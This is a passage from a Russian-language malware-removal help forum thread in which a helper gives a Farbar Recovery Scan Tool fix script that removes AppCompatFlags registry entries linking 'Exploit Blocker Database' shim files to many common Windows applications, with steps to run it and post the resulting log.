HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\InstalledSDB\{d847be8d-f997-4860-a27c-22085498a593}: [DatabasePath] -> C:\Windows\AppPatch\Custom\Custom64\{d847be8d-f997-4860-a27c-22085498a593}.sdb [2021-08-27]
HKLM\Software\...\AppCompatFlags\InstalledSDB\{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}: [DatabasePath] -> C:\Windows\AppPatch\Custom\{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb [2021-08-27]
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\acrord32.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\acrord32.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\brosec.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\brosec.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\browser.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\browser.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\cscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\cscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\excel.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\excel.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\firefox.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\firefox.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\foxitreader.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\foxitreader.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\iexplore.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\iexplore.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\infopath.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\infopath.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\java-rmi.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\java-rmi.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\javacpl.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\javacpl.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jjs.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jjs.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jp2launcher.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jp2launcher.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jusched.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\jusched.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\lync.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\lync.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\msaccess.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\msaccess.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mshta.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mshta.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mspub.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\mspub.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenoteim.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenoteim.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenotem.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\onenotem.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\opera.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\opera.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\outlook.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\outlook.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\plugin-container.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\plugin-container.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powerpnt.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powerpnt.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powershell.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\powershell.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\RdrCEF.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\RdrCEF.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skype.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skype.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skypepm.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\skypepm.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\sway.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\sway.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\winword.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\winword.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\wscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> 
HKLM\Software\Wow6432Node\...\AppCompatFlags\Custom\wscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> 
End::


2. Запустите Farbar Recovery Scan Tool.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную после данного скрипта.


 

 

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты
Burila Новичок

Burila

Опубликовано
  • Автор
Опубликовано
29.08.2021 в 09:18, thyrex сказал:

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 


Start::
CreateRestorePoint:
HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\acrord32.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\brosec.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\browser.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\cscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\excel.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\firefox.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\foxitreader.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\iexplore.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\infopath.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\java-rmi.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\javacpl.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jjs.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jp2launcher.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\jusched.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\lync.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\msaccess.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\mshta.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\mspub.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\onenoteim.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\onenotem.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\opera.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\outlook.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\plugin-container.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\powerpnt.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\powershell.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\RdrCEF.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\skype.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\skypepm.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\sway.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\winword.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{f0d5de6d-873e-45a5-a4b1-7741cc0fa7c5}.sdb] -> Exploit Blocker Database for x86
HKLM\Software\...\AppCompatFlags\Custom\wscript.exe: [{d847be8d-f997-4860-a27c-22085498a593}.sdb] -> Exploit Blocker Database for x64
HKLM\Software\...\AppCompatFlags\InstalledSDB\{d847be8d-f997-4860-a27c-22085498a593}: [DatabasePath] -> C:\Windows\AppPatch\Custom\Custom64\{d847be8d-f997-4860-a27c-22085498a593}.sdb [2021-08-27]
